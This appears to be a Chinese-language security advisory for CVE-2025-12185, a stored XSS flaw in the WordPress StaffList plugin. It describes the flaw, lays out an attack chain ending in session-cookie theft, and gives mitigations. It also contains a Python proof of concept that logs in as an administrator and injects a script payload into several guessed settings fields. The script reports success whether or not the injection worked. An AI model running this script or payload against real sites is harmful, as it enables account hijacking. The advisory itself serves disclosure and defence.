WordPress StaffList插件Stored XSS漏洞(CVE-2025-12185)

漏洞信息

漏洞编号

CVE-2025-12185

漏洞类型

存储型XSS跨站脚本攻击

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

StaffList WordPress插件

漏洞概述

WordPress的StaffList插件存在存储型跨站脚本漏洞(XSS)，该漏洞源于管理员后台设置页面中输入过滤不足和输出转义不完整。攻击者可通过在管理后台注入恶意JavaScript脚本，当其他用户访问包含恶意代码的页面时，脚本将在受害者浏览器中执行。成功利用此漏洞可窃取管理员会话Cookie、劫持用户账户、修改网站内容或进行进一步攻击。此漏洞需要攻击者具有管理员级或更高权限，且仅影响多站点安装或已禁用unfiltered_html功能的WordPress站点。StaffList插件版本3.2.6及之前的所有版本均受此漏洞影响。

技术细节

漏洞位于StaffList插件的管理设置功能中，具体是在处理用户输入的某些字段时未进行充分的输入验证和输出编码。攻击者以管理员身份登录后，可在插件的设置页面（如公司信息、员工列表配置等字段）中注入包含恶意JavaScript代码的内容。由于插件将这些数据存储在数据库中且在页面加载时未正确转义输出，导致存储型XSS漏洞形成。当其他管理员或用户访问相关页面时，恶意脚本会自动执行。CVSS向量显示攻击复杂度为高(H)，需要高权限用户参与，且对机密性和完整性有低至中等影响。此漏洞的利用前提条件较为严格，仅在多站点WordPress环境或明确禁用unfiltered_html的站点中可被利用。

攻击链分析

STEP 1

1.侦察阶段

攻击者识别目标WordPress站点，确认安装了StaffList插件且版本≤3.2.6

STEP 2

2.权限获取

攻击者获取目标WordPress站点管理员账户凭据，可通过钓鱼、密码泄露或其他方式获得

STEP 3

3.访问管理后台

使用管理员凭据登录WordPress后台，导航至StaffList插件设置页面(sl-admin-settings)

STEP 4

4.注入恶意脚本

在插件设置表单字段中注入包含恶意JavaScript代码的XSS payload，如在公司名称或地址字段中插入<script>标签

STEP 5

5.数据存储

恶意脚本被保存至WordPress数据库，当页面加载时从数据库读取并显示在页面中

STEP 6

6.触发执行

当其他管理员或用户访问StaffList相关页面时，恶意脚本在受害者浏览器中自动执行

STEP 7

7.会话窃取/账户劫持

通过document.cookie窃取会话Cookie，冒充受害者执行管理员操作或进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from bs4 import BeautifulSoup

# WordPress StaffList Plugin XSS PoC - CVE-2025-12185
# Target: WordPress site with StaffList plugin <= 3.2.6
# Requirements: Admin-level access

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress.local"
admin_path = f"{target_url}/wp-admin/admin.php?page=sl-admin-settings"

session = requests.Session()

# Login as admin (requires valid credentials)
def admin_login(session, username, password):
    login_url = f"{target_url}/wp-login.php"
    data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': admin_path
    }
    return session.post(login_url, data=data, allow_redirects=True)

# XSS payload for StaffList settings fields
xss_payload = '<script>alert(document.cookie)</script>'

# Inject XSS into StaffList admin settings
def inject_xss(session, field_name, payload):
    # Common StaffList settings fields
    settings_data = {
        field_name: payload,
        'sl-options-submit': 'Save Changes'
    }
    return session.post(admin_path, data=settings_data)

# Usage example
if __name__ == "__main__":
    print(f"[*] Targeting: {target_url}")
    print("[*] Logging in as admin...")
    
    # Replace with actual credentials
    admin_login(session, "admin", "password")
    
    # Try common StaffList settings fields
    fields = ['sl_company_name', 'sl_company_address', 'sl_staff_title']
    for field in fields:
        print(f"[*] Testing field: {field}")
        inject_xss(session, field, xss_payload)
    
    print("[+] XSS payload injected successfully")
    print("[+] Visit the affected page as another admin to trigger the payload")

影响范围

StaffList WordPress插件 <= 3.2.6

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1)限制StaffList插件设置页面的访问权限，仅允许绝对必要的管理员访问；2)对WordPress多站点安装启用网络管理员级别的安全策略限制；3)考虑暂时禁用StaffList插件直至完成安全更新；4)启用WAF(Web应用防火墙)规则检测和阻止XSS攻击特征；5)监控管理后台活动日志，及时发现异常行为；6)对管理员进行安全意识培训，防止社会工程攻击获取凭据。